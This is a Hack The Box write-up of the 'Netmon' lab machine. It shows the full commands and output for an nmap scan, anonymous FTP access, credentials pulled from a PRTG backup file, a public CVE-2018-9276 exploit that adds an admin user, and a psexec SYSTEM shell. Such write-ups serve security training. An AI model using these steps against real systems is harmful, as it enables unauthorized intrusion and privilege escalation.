Netmon
29/06/2019
Netmon is one of the easiest boxes in HTB. Getting user it's pretty straightforward, we just have to access to the ftp server. To get root, we'll need to dig into the file system to find some credentials and then use a public exploit to get RCE in the system as an administrator.
User
First run a nmap to list ports open.
root@kali:~/htb/netmon# nmap -sC -sV 10.10.10.152 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 08:03 UTC Nmap scan report for 10.10.10.152 Host is up (0.18s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-02-19 11:18PM 1024 .rnd | 02-25-19 09:15PM <DIR> inetpub | 07-16-16 08:18AM <DIR> PerfLogs | 02-25-19 09:56PM <DIR> Program Files | 02-02-19 11:28PM <DIR> Program Files (x86) | 02-03-19 07:08AM <DIR> Users |_02-25-19 10:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-server-header: PRTG/18.1.37.13946 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm |_http-trane-info: Problem with XML parsing of /evox/about 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-04 08:03:51 |_ start_date: 2019-03-04 08:01:46
In port 21 we have an ftp server, so let's try to login anonymously.
root@kali:~/htb/netmon# ftp 10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp>
Anonymous login is allowed, we get access to almost all the files in the system and we're able to download the user flag located in the Public folder.
ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection. 02-02-19 11:18PM 1024 .rnd 02-25-19 09:15PM <DIR> inetpub 07-16-16 08:18AM <DIR> PerfLogs 02-25-19 09:56PM <DIR> Program Files 02-02-19 11:28PM <DIR> Program Files (x86) 02-03-19 07:08AM <DIR> Users 02-25-19 10:49PM <DIR> Windows 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-25-19 10:44PM <DIR> Administrator 02-02-19 11:35PM <DIR> Public 226 Transfer complete. ftp> cd Public 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 07:05AM <DIR> Documents 07-16-16 08:18AM <DIR> Downloads 07-16-16 08:18AM <DIR> Music 07-16-16 08:18AM <DIR> Pictures 02-02-19 11:35PM 33 user.txt 07-16-16 08:18AM <DIR> Videos 226 Transfer complete. ftp> get user.txt
Once downloaded we can read it in our system.
root@kali:~/htb/netmon# cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Privilege Escalation
Checking what we have in the other ports we can see an http server server running on port 80 with a PRTG Network Monitor.
We don't have the credentials to access, but if we dig into the file system we'll find the following configuration and backup files in /Users/All Users/Paessler/PRTG Network Monitor.
ftp> pwd 257 "/Users/All Users/Paessler/PRTG Network Monitor" is current directory. ftp> ls -la 200 PORT command successful. 125 Data connection already open; Transfer starting. 02-03-19 12:40AM <DIR> Configuration Auto-Backups 03-14-19 05:24AM <DIR> Log Database 02-03-19 12:18AM <DIR> Logs (Debug) 02-03-19 12:18AM <DIR> Logs (Sensors) 02-03-19 12:18AM <DIR> Logs (System) 03-14-19 05:24AM <DIR> Logs (Web Server) 03-14-19 05:29AM <DIR> Monitoring Database 03-14-19 05:53AM 1296583 PRTG Configuration.dat 02-25-19 10:54PM 1189697 PRTG Configuration.old 07-14-18 03:13AM 1153755 PRTG Configuration.old.bak 03-14-19 05:25AM 1647314 PRTG Graph Data Cache.dat 02-25-19 11:00PM <DIR> Report PDFs 02-03-19 12:18AM <DIR> System Information Database 02-03-19 12:40AM <DIR> Ticket Database 02-03-19 12:18AM <DIR> ToDo Database 226 Transfer complete. ftp> get "PRTG Configuration.old.bak"
Checking its contents we see something interesting in PRTG Configuration.old.bak.
root@kali:~/htb/netmon# less 'PRTG Configuration.old.bak' ... <dbpassword> <!-- User: prtgadmin --> PrTg@dmin2018 </dbpassword> ...
If we try to login with those credentials we'll notice they don't work, that's because the file we retrieved them from was a backup, so they've probably changed.
We just have to replace the year 2018 with 2019, ending up with prtgadmin / PrTg@dmin2019 which should work and allow us to access the dashboard.
We have an exploit available in exploit-db for this software: PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution.
This script will create a malicious ps1 file and then use it to execute commands in the system, the default ones are creating an user and adding it to the administrators group.
To be able to run it we have to login in the website, get the cookie used by PRTG and pass it as an argument.
root@kali:~/htb/netmon# ./prtg-exploit.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=e0JFQjIxNjM1LUYwOTEtNDQ1NC1BNEYwLTBFREIwNzUwRkY3MX0%3D" [+]#########################################################################[+] [*] Authenticated PRTG network Monitor remote code execution [*] [+]#########################################################################[+] [*] Date: 11/03/2019 [*] [+]#########################################################################[+] [*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*] [+]#########################################################################[+] [*] Vendor Homepage: https://www.paessler.com/prtg [*] [*] Version: 18.2.38 [*] [*] CVE: CVE-2018-9276 [*] [*] Reference: https://www.codewatch.org/blog/?p=453 [*] [+]#########################################################################[+] # login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script. # run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' [+]#########################################################################[+] [*] file created [*] sending notification wait.... [*] adding a new user 'pentest' with password 'P3nT3st' [*] sending notification wait.... [*] adding a user pentest to the administrators group [*] sending notification wait.... [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
The exploit should have created an administrator user for us (pentest/P3nT3st!), so now we can use psexec to get a shell.
root@kali:~/htb/netmon# /opt/impacket/examples/psexec.py pentest@10.10.10.152 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies Password: P3nT3st! [*] Requesting shares on 10.10.10.152..... [*] Found writable share ADMIN$ [*] Uploading file NSSEOeLR.exe [*] Opening SVCManager on 10.10.10.152..... [*] Creating service tgQH on 10.10.10.152..... [*] Starting service tgQH..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
The root flag is in the Administrator desktop.
C:\Users\Administrator\Desktop>type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX